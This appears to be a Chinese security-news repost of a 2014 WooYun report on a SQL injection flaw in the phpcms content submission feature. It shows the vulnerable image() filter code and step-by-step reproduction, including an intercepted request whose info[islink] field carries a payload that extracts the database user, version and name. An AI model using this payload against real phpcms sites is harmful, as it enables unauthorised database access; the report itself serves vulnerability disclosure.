记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

phpcms最新版本SQL注入一枚

2014-11-28 02:00

漏洞文件

code 区域
/caches/caches_model/caches_data/content_input.class.php

function image($field, $value) {

$value = remove_xss(str_replace(array("'",'"','(',')'),'',$value));

return trim($value);

}



过滤不单引号,由于GPC的关系,因此会留下 \ ,造成注入

漏洞利用证明:

开启投稿

1.首先随便提交一个文章,保存 点编辑,如图

1.jpg



2.进入编辑后,直接点击保存 ,然后抓包修改如下

2.jpg



修改info[thumb]为:http://site'

修改info[islink]为:

,description=(select concat(user(),0x7c,version(),0x7c,database())) -- s

最后确认。

再次进入编辑页面,可以看见注入的结果,如图:

3.jpg

漏洞证明:

3.jpg

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2014-074666

阅读:77009 | 评论:0 | 标签:注入 cms phpcms

想收藏或者和大家分享这篇好文章→复制链接地址

“phpcms最新版本SQL注入一枚”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云